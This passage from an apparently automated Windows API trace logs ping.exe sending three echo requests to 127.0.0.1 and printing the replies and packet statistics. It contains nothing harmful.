lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xbfee28, nSize=0x0, Arguments=0xbfee24 | out: lpBuffer="笈è¿⛔\x94䰨盪✣") returned 0x16 [0122.844] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0122.844] _fileno (_File=0x76ea4c28) returned 1 [0122.844] _get_osfhandle (_FileHandle=1) returned 0x28 [0122.844] GetFileType (hFile=0x28) returned 0x2 [0122.844] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xbfedec | out: lpMode=0xbfedec) returned 0 [0122.844] GetLastError () returned 0x6 [0122.844] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xbfed50, nSize=0x50 | out: lpBuffer="¿✣") returned 0x0 [0122.844] _fileno (_File=0x76ea4c28) returned 1 [0122.844] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0122.844] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0122.844] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xe87b40 [0122.844] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xe87b40, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0122.844] _fileno (_File=0x76ea4c28) returned 1 [0122.844] _write (in: _FileHandle=1, _Buf=0xe87b40*, _MaxCharCount=0x16 | out: _Buf=0xe87b40*) returned 22 [0122.844] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0122.844] _fileno (_File=0x76ea4c28) returned 1 [0122.844] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0122.844] LocalFree (hMem=0xe87b40) returned 0x0 [0122.844] LocalFree (hMem=0xe87b08) returned 0x0 [0122.844] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0xbfee28, nSize=0x0, Arguments=0xbfee24 | out: lpBuffer="笈è¿⛿\x94䰨盪✼") returned 0x9 [0122.844] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0122.844] _fileno (_File=0x76ea4c28) returned 1 [0122.844] _get_osfhandle (_FileHandle=1) returned 0x28 [0122.844] GetFileType (hFile=0x28) returned 0x2 [0122.844] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xbfedec | out: lpMode=0xbfedec) returned 0 [0122.844] GetLastError () returned 0x6 [0122.844] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xbfed50, nSize=0x50 | out: lpBuffer="¿✼") returned 0x0 [0122.845] _fileno (_File=0x76ea4c28) returned 1 [0122.845] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0122.845] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0122.845] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xe78ac0 [0122.845] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xe78ac0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0122.845] _fileno (_File=0x76ea4c28) returned 1 [0122.845] _write (in: _FileHandle=1, _Buf=0xe78ac0*, _MaxCharCount=0x9 | out: _Buf=0xe78ac0*) returned 9 [0122.845] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0122.845] _fileno (_File=0x76ea4c28) returned 1 [0122.845] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0122.845] LocalFree (hMem=0xe78ac0) returned 0x0 [0122.845] LocalFree (hMem=0xe87b08) returned 0x0 [0122.845] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xbfee2c, nSize=0x0, Arguments=0xbfee28 | out: lpBuffer="笈è¿➷\x94䰨盪✧") returned 0x9 [0122.845] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0122.845] _fileno (_File=0x76ea4c28) returned 1 [0122.845] _get_osfhandle (_FileHandle=1) returned 0x28 [0122.845] GetFileType (hFile=0x28) returned 0x2 [0122.845] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xbfedf0 | out: lpMode=0xbfedf0) returned 0 [0122.845] GetLastError () returned 0x6 [0122.845] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xbfed54, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0122.845] _fileno (_File=0x76ea4c28) returned 1 [0122.845] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0122.845] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0122.845] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xe78a78 [0122.845] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xe78a78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0122.845] _fileno (_File=0x76ea4c28) returned 1 [0122.845] _write (in: _FileHandle=1, _Buf=0xe78a78*, _MaxCharCount=0x9 | out: _Buf=0xe78a78*) returned 9 [0122.845] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0122.845] _fileno (_File=0x76ea4c28) returned 1 [0122.845] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0122.845] LocalFree (hMem=0xe78a78) returned 0x0 [0122.845] LocalFree (hMem=0xe87b08) returned 0x0 [0122.845] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0xbfee28, nSize=0x0, Arguments=0xbfee24 | out: lpBuffer="笈è¿⟘\x94䰨盪✨") returned 0x9 [0122.845] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0122.845] _fileno (_File=0x76ea4c28) returned 1 [0122.845] _get_osfhandle (_FileHandle=1) returned 0x28 [0122.845] GetFileType (hFile=0x28) returned 0x2 [0122.845] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xbfedec | out: lpMode=0xbfedec) returned 0 [0122.845] GetLastError () returned 0x6 [0122.845] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xbfed50, nSize=0x50 | out: lpBuffer="¿✨") returned 0x0 [0122.845] _fileno (_File=0x76ea4c28) returned 1 [0122.845] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0122.845] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0122.845] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xe78ac0 [0122.845] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xe78ac0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0122.845] _fileno (_File=0x76ea4c28) returned 1 [0122.845] _write (in: _FileHandle=1, _Buf=0xe78ac0*, _MaxCharCount=0x9 | out: _Buf=0xe78ac0*) returned 9 [0122.845] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0122.845] _fileno (_File=0x76ea4c28) returned 1 [0122.845] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0122.845] LocalFree (hMem=0xe78ac0) returned 0x0 [0122.845] LocalFree (hMem=0xe87b08) returned 0x0 [0122.845] Sleep (dwMilliseconds=0x3e8) [0123.858] IcmpSendEcho2Ex (in: IcmpHandle=0xe76b48, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xe7c4d0, RequestSize=0x20, RequestOptions=0xbfeea4, ReplyBuffer=0xe85270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xe85270) returned 0x1 [0123.859] InetNtopW (in: Family=2, pAddr=0xbfee94, pStringBuf=0xbfefbc, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0123.860] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xbfee28, nSize=0x0, Arguments=0xbfee24 | out: lpBuffer="羠è¿⛔\x94䰨盪✣") returned 0x16 [0123.860] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0123.860] _fileno (_File=0x76ea4c28) returned 1 [0123.860] _get_osfhandle (_FileHandle=1) returned 0x28 [0123.860] GetFileType (hFile=0x28) returned 0x2 [0123.860] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xbfedec | out: lpMode=0xbfedec) returned 0 [0123.860] GetLastError () returned 0x6 [0123.860] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xbfed50, nSize=0x50 | out: lpBuffer="¿✣") returned 0x0 [0123.860] _fileno (_File=0x76ea4c28) returned 1 [0123.860] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0123.860] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0123.860] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xe87fd8 [0123.860] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xe87fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0123.860] _fileno (_File=0x76ea4c28) returned 1 [0123.860] _write (in: _FileHandle=1, _Buf=0xe87fd8*, _MaxCharCount=0x16 | out: _Buf=0xe87fd8*) returned 22 [0123.860] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0123.860] _fileno (_File=0x76ea4c28) returned 1 [0123.860] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0123.860] LocalFree (hMem=0xe87fd8) returned 0x0 [0123.860] LocalFree (hMem=0xe87fa0) returned 0x0 [0123.860] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0xbfee28, nSize=0x0, Arguments=0xbfee24 | out: lpBuffer="羠è¿⛿\x94䰨盪✼") returned 0x9 [0123.860] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0123.860] _fileno (_File=0x76ea4c28) returned 1 [0123.860] _get_osfhandle (_FileHandle=1) returned 0x28 [0123.860] GetFileType (hFile=0x28) returned 0x2 [0123.860] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xbfedec | out: lpMode=0xbfedec) returned 0 [0123.860] GetLastError () returned 0x6 [0123.861] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xbfed50, nSize=0x50 | out: lpBuffer="¿✼") returned 0x0 [0123.861] _fileno (_File=0x76ea4c28) returned 1 [0123.861] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0123.861] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0123.861] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xe789e8 [0123.861] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xe789e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0123.861] _fileno (_File=0x76ea4c28) returned 1 [0123.861] _write (in: _FileHandle=1, _Buf=0xe789e8*, _MaxCharCount=0x9 | out: _Buf=0xe789e8*) returned 9 [0123.861] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0123.861] _fileno (_File=0x76ea4c28) returned 1 [0123.861] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0123.861] LocalFree (hMem=0xe789e8) returned 0x0 [0123.861] LocalFree (hMem=0xe87fa0) returned 0x0 [0123.861] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xbfee2c, nSize=0x0, Arguments=0xbfee28 | out: lpBuffer="羠è¿➷\x94䰨盪✧") returned 0x9 [0123.861] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0123.861] _fileno (_File=0x76ea4c28) returned 1 [0123.861] _get_osfhandle (_FileHandle=1) returned 0x28 [0123.861] GetFileType (hFile=0x28) returned 0x2 [0123.861] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xbfedf0 | out: lpMode=0xbfedf0) returned 0 [0123.861] GetLastError () returned 0x6 [0123.861] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xbfed54, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0123.861] _fileno (_File=0x76ea4c28) returned 1 [0123.861] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0123.861] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0123.861] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xe78a30 [0123.861] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xe78a30, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0123.861] _fileno (_File=0x76ea4c28) returned 1 [0123.861] _write (in: _FileHandle=1, _Buf=0xe78a30*, _MaxCharCount=0x9 | out: _Buf=0xe78a30*) returned 9 [0123.861] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0123.861] _fileno (_File=0x76ea4c28) returned 1 [0123.861] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0123.861] LocalFree (hMem=0xe78a30) returned 0x0 [0123.861] LocalFree (hMem=0xe87fa0) returned 0x0 [0123.861] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0xbfee28, nSize=0x0, Arguments=0xbfee24 | out: lpBuffer="羠è¿⟘\x94䰨盪✨") returned 0x9 [0123.861] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0123.861] _fileno (_File=0x76ea4c28) returned 1 [0123.861] _get_osfhandle (_FileHandle=1) returned 0x28 [0123.861] GetFileType (hFile=0x28) returned 0x2 [0123.861] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xbfedec | out: lpMode=0xbfedec) returned 0 [0123.862] GetLastError () returned 0x6 [0123.862] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xbfed50, nSize=0x50 | out: lpBuffer="¿✨") returned 0x0 [0123.862] _fileno (_File=0x76ea4c28) returned 1 [0123.862] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0123.862] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0123.862] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xe789e8 [0123.862] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xe789e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0123.862] _fileno (_File=0x76ea4c28) returned 1 [0123.862] _write (in: _FileHandle=1, _Buf=0xe789e8*, _MaxCharCount=0x9 | out: _Buf=0xe789e8*) returned 9 [0123.862] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0123.862] _fileno (_File=0x76ea4c28) returned 1 [0123.862] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0123.862] LocalFree (hMem=0xe789e8) returned 0x0 [0123.862] LocalFree (hMem=0xe87fa0) returned 0x0 [0123.862] Sleep (dwMilliseconds=0x3e8) [0124.880] IcmpSendEcho2Ex (in: IcmpHandle=0xe76b48, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xe7c4d0, RequestSize=0x20, RequestOptions=0xbfeea4, ReplyBuffer=0xe85270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xe85270) returned 0x1 [0124.880] InetNtopW (in: Family=2, pAddr=0xbfee94, pStringBuf=0xbfefbc, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0124.880] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xbfee28, nSize=0x0, Arguments=0xbfee24 | out: lpBuffer="羠è¿⛔\x94䰨盪✣") returned 0x16 [0124.880] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0124.880] _fileno (_File=0x76ea4c28) returned 1 [0124.880] _get_osfhandle (_FileHandle=1) returned 0x28 [0124.880] GetFileType (hFile=0x28) returned 0x2 [0124.880] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xbfedec | out: lpMode=0xbfedec) returned 0 [0124.881] GetLastError () returned 0x6 [0124.881] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xbfed50, nSize=0x50 | out: lpBuffer="¿✣") returned 0x0 [0124.881] _fileno (_File=0x76ea4c28) returned 1 [0124.881] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0124.881] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0124.881] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xe87fd8 [0124.881] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xe87fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0124.881] _fileno (_File=0x76ea4c28) returned 1 [0124.881] _write (in: _FileHandle=1, _Buf=0xe87fd8*, _MaxCharCount=0x16 | out: _Buf=0xe87fd8*) returned 22 [0124.881] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0124.881] _fileno (_File=0x76ea4c28) returned 1 [0124.881] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0124.881] LocalFree (hMem=0xe87fd8) returned 0x0 [0124.881] LocalFree (hMem=0xe87fa0) returned 0x0 [0124.881] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0xbfee28, nSize=0x0, Arguments=0xbfee24 | out: lpBuffer="羠è¿⛿\x94䰨盪✼") returned 0x9 [0124.881] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0124.881] _fileno (_File=0x76ea4c28) returned 1 [0124.881] _get_osfhandle (_FileHandle=1) returned 0x28 [0124.881] GetFileType (hFile=0x28) returned 0x2 [0124.881] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xbfedec | out: lpMode=0xbfedec) returned 0 [0124.881] GetLastError () returned 0x6 [0124.881] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xbfed50, nSize=0x50 | out: lpBuffer="¿✼") returned 0x0 [0124.881] _fileno (_File=0x76ea4c28) returned 1 [0124.881] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0124.881] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0124.881] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xe78970 [0124.881] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xe78970, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0124.881] _fileno (_File=0x76ea4c28) returned 1 [0124.881] _write (in: _FileHandle=1, _Buf=0xe78970*, _MaxCharCount=0x9 | out: _Buf=0xe78970*) returned 9 [0124.881] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0124.881] _fileno (_File=0x76ea4c28) returned 1 [0124.881] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0124.881] LocalFree (hMem=0xe78970) returned 0x0 [0124.881] LocalFree (hMem=0xe87fa0) returned 0x0 [0124.881] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xbfee2c, nSize=0x0, Arguments=0xbfee28 | out: lpBuffer="羠è¿➷\x94䰨盪✧") returned 0x9 [0124.881] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0124.881] _fileno (_File=0x76ea4c28) returned 1 [0124.881] _get_osfhandle (_FileHandle=1) returned 0x28 [0124.881] GetFileType (hFile=0x28) returned 0x2 [0124.881] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xbfedf0 | out: lpMode=0xbfedf0) returned 0 [0124.881] GetLastError () returned 0x6 [0124.881] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xbfed54, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0124.881] _fileno (_File=0x76ea4c28) returned 1 [0124.881] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0124.881] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0124.881] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xe78970 [0124.881] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xe78970, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0124.881] _fileno (_File=0x76ea4c28) returned 1 [0124.881] _write (in: _FileHandle=1, _Buf=0xe78970*, _MaxCharCount=0x9 | out: _Buf=0xe78970*) returned 9 [0124.882] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0124.882] _fileno (_File=0x76ea4c28) returned 1 [0124.882] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0124.882] LocalFree (hMem=0xe78970) returned 0x0 [0124.882] LocalFree (hMem=0xe87fa0) returned 0x0 [0124.882] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0xbfee28, nSize=0x0, Arguments=0xbfee24 | out: lpBuffer="羠è¿⟘\x94䰨盪✨") returned 0x9 [0124.882] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0124.882] _fileno (_File=0x76ea4c28) returned 1 [0124.882] _get_osfhandle (_FileHandle=1) returned 0x28 [0124.882] GetFileType (hFile=0x28) returned 0x2 [0124.882] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xbfedec | out: lpMode=0xbfedec) returned 0 [0124.882] GetLastError () returned 0x6 [0124.882] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xbfed50, nSize=0x50 | out: lpBuffer="¿✨") returned 0x0 [0124.882] _fileno (_File=0x76ea4c28) returned 1 [0124.882] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0124.882] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0124.882] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xe78a30 [0124.882] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xe78a30, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0124.882] _fileno (_File=0x76ea4c28) returned 1 [0124.882] _write (in: _FileHandle=1, _Buf=0xe78a30*, _MaxCharCount=0x9 | out: _Buf=0xe78a30*) returned 9 [0124.882] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0124.882] _fileno (_File=0x76ea4c28) returned 1 [0124.882] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0124.882] LocalFree (hMem=0xe78a30) returned 0x0 [0124.882] LocalFree (hMem=0xe87fa0) returned 0x0 [0124.882] GetNameInfoW (in: pSockaddr=0x945480*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0xbfedb0, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0124.882] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274f, dwLanguageId=0x0, lpBuffer=0xbfed84, nSize=0x0, Arguments=0xbfed80 | out: lpBuffer="羠è¿᧰\x94䰨盪❏") returned 0x5c [0124.882] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0124.882] _fileno (_File=0x76ea4c28) returned 1 [0124.882] _get_osfhandle (_FileHandle=1) returned 0x28 [0124.882] GetFileType (hFile=0x28) returned 0x2 [0124.882] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xbfed48 | out: lpMode=0xbfed48) returned 0 [0124.882] GetLastError () returned 0x6 [0124.882] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xbfecac, nSize=0x50 | out: lpBuffer="❏") returned 0x0 [0124.882] _fileno (_File=0x76ea4c28) returned 1 [0124.882] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0124.882] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 93 [0124.882] LocalAlloc (uFlags=0x40, uBytes=0x5d) returned 0xe88068 [0124.882] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0xe88068, cbMultiByte=93, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received 